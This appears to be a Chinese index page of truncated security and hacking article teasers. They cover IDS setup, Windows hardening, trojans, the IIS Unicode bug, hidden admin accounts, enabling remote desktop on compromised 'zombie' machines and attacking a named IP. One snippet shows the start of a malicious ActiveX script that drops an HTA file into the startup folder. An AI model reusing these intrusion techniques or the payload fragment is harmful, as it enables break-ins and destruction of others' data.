入侵检测 系统也叫IDS=instrusion detection system,他常常被 网络 管理员用来检测网络受攻击的程度和频繁度,为他进行下一步的管理提供充足的资料。 这里采用 linux +snort,因为他们都是免费的,并且采..
安全专家通常发现,不起眼的工作站往往正是工作场所安全当中最薄弱的环节。 很多攻击事件就是通过入侵企业里面的工作站来破坏其数据资产的完整性。这是因为大多数组织采用同类环境,..
本文是一篇安全向导,以帮助管理员和安全专家更健康的配置 windows 平台。 防火墙和它们充当的角色 防火墙是被连接到互联网任一个网络的整体部分。如果没有安装防火墙,许多攻击可能在管..
-------------------------------------------------------------------------------- 内容一览 为什么会有这份文档? 什么是黑客? 黑客应有的态度 黑客的基本技能 黑客文化中的地位 黑客和书呆子(Nerd)的联系 风格..
我们上网时常见到一些:“注册表被某某网站改写”或者“上了某某网站后,开机时会弹出对话框。”等等这一类的现象。其实,都只是一些网站利用简单的HTML编程改写注册表而实现的。那么..
上网久了,大家免不了会遇上………… 请大家一起来举报恶意网站!把你知道的告诉大家,让大家不要受害! 切记!!!以下网址未经处理,请不要误按,后果自负。 http://www.ttlook.com http://..
当前最为常见的木马通常是基于TCP/UDP协议进行client端与server端之间的通讯的,既然利用到这两个协议,就不可避免要在server端(就是被种了木马的机器了)打开监听端口来等待连接。例如鼎鼎..
大家对木马都不陌生了,它可能要算是计算机病毒史上最厉害的了,相信会使木马的人千千万万,但是有很多人苦于怎么把木马发给对方,现在随着计算机的普及,在 网络 上我相信很少有人会..
IPSec术语 在执行以下指导步骤之前,确保您知道以下术语的含义: 身份验证:确定计算机的身份是否合法的过程。Windows2000IPSec支持三种身份验证:Kerberos、证书和预共享密钥。只有当两个终结..
一、UNICODE漏洞的原理 此漏洞从中文IIS4.0+SP6开始,还影响中文WIN2000+IIS5.0、中文WIN2000+IIS5.0+SP1, 台湾繁体中文也同样存在这样的漏洞。 中文版的WIN2000中,UNICODE编码存在BUG,在UNICODE编码中 %c1..
最近闲着无事,正好写点东西,为了让更多的人能理解,我就从最简单的网页讲起好了! 我们先从最简单的javascript加密页开始,在网上你可能会碰到很多用javascript编的要求你输入用户和密码的..
如果你使用的是最早版本的 Windows 95,那关闭NetBIOS就是一件非常容易的事:找到系统里名为Vnbt.386的文件,随便将它改个名,如改为Vnbt.out,这就算大功告成了。 如果你使用的是Windows95改进版、..
漏洞攻击 对微软(Microsoft)而言,最具讽刺的是总被黑客先发现漏洞,待 Windows 们倒下后,微软才站出来补充两句:“最新的补丁已经发布,如果客户没有及时下载补丁程序而造成的后果,我..
前几天在某个网站(记不清了,不好意思^_*)上看到了一篇介绍如何建立隐藏的超级用户的图文教程,给我了很大的启发,作者只说明了如何在本地图形界面下建立隐藏的超级用户,且作者说他..
格式化硬盘 objectid="scr"classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC" /object script scr.Reset(); scr.Path="C:\\ windows \\Men?inicio\\Programas\\Inicio\\automat.hta"; scr.Doc="objectid='wsh'classid='clsid:F935DC22-1CF0-11D0-ADB9-0..
所谓对telnet的攻击也不外乎对telnet的用户猜解和对telnet服务进程的溢出,除了这些,本人觉得telnet并没有太大的问题.telnet的连接并不是大家想象的那么简单了,虽然没有像ssh那样进行加密,不..
图文教程,让你的肉机更 安全 呵呵,总有人向我反应说他们的肉机给人黑了 好惨,因为他们一般是利用弱口令进去的 那么,别人一定也能利用弱口令进来啊,所以,要构造一台安全的肉机是..
首先我们制作开启3389的工具 先把下面的注册表内容copy一份,另存为3389.reg注册表文件 注册表内容: WindowsRegistryEditorVersion5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] "Enabled"="0"..
假设想攻击的主机IP是:61.139.1.79 同一子网下我们已有权限的主机IP是:61.139.1.88并可以3389登陆 第一步: tracert61.139.1.1 C:\WIN2000\system32tracert61.139.1.1 TracingroutetoHACK-4FJ7EARC[61.139.1.1] overamaximumof30hops: 11..
大家是不是大都使用别人的工具来搞入侵呢,我也是,不过从学了编程以后,老是想自己写点程序,然后用它来入侵,这里就是教你如何实现自己的的梦想。 今天所要演示的是telnet的入侵,近..